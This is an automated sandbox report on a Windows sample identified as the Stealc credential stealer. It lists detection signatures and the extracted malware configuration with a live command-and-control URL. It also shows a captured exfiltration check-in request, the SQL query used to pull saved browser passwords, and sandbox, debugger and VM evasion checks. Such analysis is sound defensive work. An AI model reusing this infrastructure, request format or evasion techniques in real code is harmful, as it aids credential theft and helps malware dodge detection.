Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520474
MD5:219066ac9697d1cdeb536bc4ea74c123
SHA1:a8f5b34c40766dbf7ae0140c581dc23c5d75918f
SHA256:ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
Tags:exeStealcuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 219066AC9697D1CDEB536BC4EA74C123)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1216JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1216JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.940000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T11:26:07.373709+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.940000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0094C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00949AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00947240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00949B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00958EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00958EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00954910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0094DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0094E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0094ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00954570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094F68A FindFirstFileA,0_2_0094F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0094F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00953EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0094DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0094BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00944880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--
                Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/I~
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo?
                Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/n

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F0_2_00CD686F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8007B0_2_00C8007B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29800_2_00CE2980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0BA070_2_00D0BA07
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D083F60_2_00D083F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFE3AB0_2_00CFE3AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D15B680_2_00D15B68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB5C610_2_00BB5C61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5141F0_2_00C5141F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0D5C00_2_00D0D5C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D035E10_2_00D035E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFB5DF0_2_00BFB5DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2056B0_2_00C2056B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBCD120_2_00CBCD12
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3E990_2_00BF3E99
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFFEB70_2_00CFFEB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D09E540_2_00D09E54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD26420_2_00CD2642
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC77A90_2_00BC77A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0EFFD0_2_00D0EFFD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1270D0_2_00C1270D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pypkqjdw ZLIB complexity 0.9947862861570248
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00958680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00958680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00953720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00953720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6MDZQ8MF.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1828864 > 1048576
                Source: file.exeStatic PE information: Raw size of pypkqjdw is bigger than: 0x100000 < 0x198600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.940000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00959860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1caa0f should be: 0x1cca40
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pypkqjdw
                Source: file.exeStatic PE information: section name: fqpfwnfj
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push 45D11B5Ch; mov dword ptr [esp], ebx0_2_00CB88F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push 1B3F5D88h; mov dword ptr [esp], edx0_2_00CB89CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push 17EE9B89h; mov dword ptr [esp], ecx0_2_00CB89E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push ebp; mov dword ptr [esp], edx0_2_00CB8A60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push 7ACF34A2h; mov dword ptr [esp], ecx0_2_00CB8A96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB88C2 push eax; mov dword ptr [esp], ebp0_2_00CB8AA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAC8C4 push 3D0B2B3Ch; mov dword ptr [esp], esp0_2_00DAC93D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D860FD push 5CEB16B2h; mov dword ptr [esp], ebx0_2_00D8613D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D860FD push 3919A446h; mov dword ptr [esp], eax0_2_00D8617F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAF8FE push ebp; mov dword ptr [esp], edi0_2_00CAF9AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAF8FE push ecx; mov dword ptr [esp], E60C94C7h0_2_00CAF9E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD309C push edi; mov dword ptr [esp], ebp0_2_00DD30D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD309C push ecx; mov dword ptr [esp], 5FF79B79h0_2_00DD30E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2D885 push edi; mov dword ptr [esp], esi0_2_00D2D8A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C38099 push edx; mov dword ptr [esp], 12A2CCC0h0_2_00C380DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C38099 push 37E74602h; mov dword ptr [esp], eax0_2_00C3813C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE0085 push ebp; mov dword ptr [esp], ecx0_2_00DE00AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE0085 push 4785A463h; mov dword ptr [esp], ebp0_2_00DE00C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4485E push 5DD3F517h; mov dword ptr [esp], eax0_2_00D448A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7B859 push ebp; mov dword ptr [esp], ebx0_2_00D7B896
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F059 push ebp; mov dword ptr [esp], esi0_2_00D6F067
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095B035 push ecx; ret 0_2_0095B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71076 push ebx; mov dword ptr [esp], edx0_2_00D71098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F push 65287EA0h; mov dword ptr [esp], ebx0_2_00CD689D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F push 5DEB55EAh; mov dword ptr [esp], edx0_2_00CD69DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F push edx; mov dword ptr [esp], esi0_2_00CD6A83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F push ebx; mov dword ptr [esp], ebp0_2_00CD6ADB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD686F push edx; mov dword ptr [esp], esp0_2_00CD6ADF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD304D push ebp; mov dword ptr [esp], 67FEB9D0h0_2_00FD30CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD304D push edi; mov dword ptr [esp], esi0_2_00FD310B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD304D push 6A8AA740h; mov dword ptr [esp], ebx0_2_00FD3148
                Source: file.exeStatic PE information: section name: pypkqjdw entropy: 7.954735554227634

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00959860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13407
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDEB7 second address: CFDEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F0D344F4AB6h 0x0000000c popad 0x0000000d jmp 00007F0D344F4AC3h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDEDD second address: CFDEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14F67 second address: D14F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14F76 second address: D14FAF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0D34B708FAh 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F0D34B708FEh 0x0000001a jp 00007F0D34B708F6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0D34B70901h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15272 second address: D15278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17D81 second address: D17D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17D85 second address: D17D8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
